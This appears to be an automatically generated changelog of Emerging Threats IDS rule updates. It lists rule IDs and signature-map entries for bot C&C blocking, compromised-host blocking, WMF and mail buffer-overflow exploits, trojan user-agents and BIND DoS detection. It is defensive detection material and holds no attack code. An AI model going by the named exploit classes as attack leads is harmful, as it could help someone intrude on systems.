    2405020 - ET DROP Known Bot C&C Traffic (group 21) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405021 - ET DROP Known Bot C&C Traffic (group 22) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405022 - ET DROP Known Bot C&C Traffic (group 23) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405023 - ET DROP Known Bot C&C Traffic (group 24) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)
    2405024 - ET DROP Known Bot C&C Traffic (group 25) - BLOCKING SOURCE (emerging-botcc-BLOCK.rules)

[///] Modified inactive rules: [///]

    2001402 - ET POLICY ZIPPED DOC in transit (emerging-policy.rules)
    2001403 - ET POLICY ZIPPED XLS in transit (emerging-policy.rules)
    2001404 - ET POLICY ZIPPED EXE in transit (emerging-policy.rules)
    2001405 - ET POLICY ZIPPED PPT in transit (emerging-policy.rules)

[---] Disabled and modified rules: [---]

    2002315 - ET EXPLOIT Incoming Electronic Mail for UNIX Expires Header Buffer Overflow Exploit (emerging-exploit.rules)
    2002316 - ET EXPLOIT Outgoing Electronic Mail for UNIX Expires Header Buffer Overflow Exploit (emerging-exploit.rules)
    2002741 - ET EXPLOIT WMF Escape Record Exploit - Web Only - version 3 (emerging-exploit.rules)
    2002742 - ET EXPLOIT WMF Escape Record Exploit - Version 3 (emerging-exploit.rules)
    2002757 - ET EXPLOIT WMF Escape Record Exploit - Web Only - version 1 (emerging-exploit.rules)
    2002758 - ET EXPLOIT WMF Escape Record Exploit - Version 1 (emerging-exploit.rules)

[---] Disabled rules: [---]

    2002734 - ET EXPLOIT WMF Exploit (emerging-exploit.rules)
    2002743 - ET EXPLOIT WMF Escape Record Exploit - Web Only - all versions (emerging-exploit.rules)

[+++] Added non-rule lines: [+++]

    -> Added to emerging-exploit.rules (1):
        ## These rules have to be there for both

    -> Added to emerging-sid-msg.map (14):
        2003192 || ET VOIP INVITE Message Flood TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003192
        2003193 || ET VOIP REGISTER Message Flood TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003193
        2003194 || ET VOIP Multiple Unauthorized SIP Responses TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2003194
        2009685 || ET TROJAN Unkown Trojan User-Agent (5.1 ...) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Unknown || url,doc.emergingthreats.net/2009685
        2009694 || ET TROJAN Navipromo related update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Navipromo || url,doc.emergingthreats.net/2009694
        2009695 || ET CURRENT_EVENTS ISC BIND9 Update DoS || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009695 || url,www.isc.org/node/474 || url,downloads.securityfocus.com/vulnerabilities/exploits/35848.txt
        2009696 || ET POLICY External Connection to Altiris HelpDesk || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Altiris || url,doc.emergingthreats.net/2009696 || url,www.symantec.com/business/theme.jsp?themeid=altiris
        2009697 || ET POLICY External Connection to Altiris Console || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Altiris || url,doc.emergingthreats.net/2009697 || url,www.symantec.com/business/theme.jsp?themeid=altiris
        2009698 || ET VOIP INVITE Message Flood UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2009698
        2009699 || ET VOIP REGISTER Message Flood UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2009699
        2009700 || ET VOIP Multiple Unauthorized SIP Responses UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2009700
        2009701 || ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009701 || cve,2009-0696
        2009702 || ET CURRENT_EVENTS POLICY DNS Update From External net || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009702
        2009703 || ET MALWARE Suspicious User-Agent (INet) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/2009703

    -> Added to emerging-sid-msg.map.txt (14):
        2003192 || ET VOIP INVITE Message Flood TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003192
        2003193 || ET VOIP REGISTER Message Flood TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003193
        2003194 || ET VOIP Multiple Unauthorized SIP Responses TCP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2003194
        2009685 || ET TROJAN Unkown Trojan User-Agent (5.1 ...) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Unknown || url,doc.emergingthreats.net/2009685
        2009694 || ET TROJAN Navipromo related update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Navipromo || url,doc.emergingthreats.net/2009694
        2009695 || ET CURRENT_EVENTS ISC BIND9 Update DoS || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009695 || url,www.isc.org/node/474 || url,downloads.securityfocus.com/vulnerabilities/exploits/35848.txt
        2009696 || ET POLICY External Connection to Altiris HelpDesk || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Altiris || url,doc.emergingthreats.net/2009696 || url,www.symantec.com/business/theme.jsp?themeid=altiris
        2009697 || ET POLICY External Connection to Altiris Console || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Altiris || url,doc.emergingthreats.net/2009697 || url,www.symantec.com/business/theme.jsp?themeid=altiris
        2009698 || ET VOIP INVITE Message Flood UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2009698
        2009699 || ET VOIP REGISTER Message Flood UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding
|| url,doc.emergingthreats.net/2009699 2009700 || ET VOIP Multiple Unauthorized SIP Responses UDP || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2009700 2009701 || ET CURRENT_EVENTS DNS BIND 9 Dynamic Update DoS attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009701 || cve,2009-0696 2009702 || ET CURRENT_EVENTS POLICY DNS Update From External net || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009702 2009703 || ET MALWARE Suspicious User-Agent (INet) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/2009703 -> Added to emerging-virus.rules (1): #by Markus Lude -> Added to emerging.rules (3): #broken, replaced with below rule #by Daniel Sheperd #this sig JUST gets updates from external_net, not the exploit. Will go to policy later [---] Removed non-rule lines: [---] -> Removed from emerging-exploit.rules (1): # These rules have to be there for both -> Removed from emerging-sid-msg.map (304): 2003192 || ET VOIP INVITE Message Flood || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003192 2003193 || ET VOIP REGISTER Message Flood || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003193 2003194 || ET VOIP Multiple Unauthorized SIP Responses || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2003194 2009685 || ET TROJAN Unkown Trojan User-Agent (5.1 07:00 ...) 
|| url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Unknown || url,doc.emergingthreats.net/2009685
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510316 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (159) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510317 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (159) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510318 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (160) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510319 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (160) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510320 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (161) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510321 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (161) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510322 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (162) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510323 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (162) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510324 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (163) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510325 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (163) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510326 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (164) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510327 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (164) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510328 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (165) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510329 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (165) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510330 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (166) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510331 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (166) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510332 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (167) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510333 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (167) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510334 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (168) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510335 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (168) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510336 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (169) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510337 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (169) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510338 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (170) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510339 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (170) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510340 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (171) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510341 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (171) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510342 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (172) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510343 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (172) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510344 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (173) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510345 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (173) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510346 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (174) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510347 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (174) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510348 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (175) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510349 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (175) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510350 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (176) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510351 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (176) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510352 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (177) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510353 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (177) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510354 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (178) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510355 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (178) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510356 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (179) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510357 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (179) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510358 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (180) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510359 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (180) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510360 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (181) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510361 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (181) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510362 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (182) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510363 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (182) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510364 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (183) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510365 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (183) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510366 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (184) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510367 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (184) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510368 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (185) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510369 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (185) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510370 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (186) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510371 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (186) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510372 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (187) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510373 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (187) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510374 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (188) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510375 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (188) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510376 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (189) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510377 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (189) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510378 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (190) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510379 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (190) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510380 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (191) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510381 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (191) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510382 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510383 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (192) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Removed from emerging-sid-msg.map.txt (304):
2003192 || ET VOIP INVITE Message Flood || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003192
2003193 || ET VOIP REGISTER Message Flood || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Flooding || url,doc.emergingthreats.net/2003193
2003194 || ET VOIP Multiple Unauthorized SIP Responses || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VOIP/VOIP_Unauth || url,doc.emergingthreats.net/2003194
2009685 || ET TROJAN Unkown Trojan User-Agent (5.1 07:00 ...) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Unknown || url,doc.emergingthreats.net/2009685
2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500247 || ET COMPROMISED Known Compromised or Hostile Host
Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500258 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500259 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500260 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500261 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (131) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500262 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500263 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500264 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500265 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500266 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500267 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500268 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500269 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500270 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500271 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500272 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500273 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500274 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500275 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (138) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500276 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500277 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500278 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500279 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500280 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500281 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500282 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500283 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500284 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500285 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500286 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500287 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500288 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500289 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (145) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500290 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500291 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (146) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500292 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500293 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (147) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500294 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500295 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (148) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500296 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500297 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (149) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500298 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500299 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (150) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500300 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500301 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (151) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500302 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (152) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500303 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (152) || 
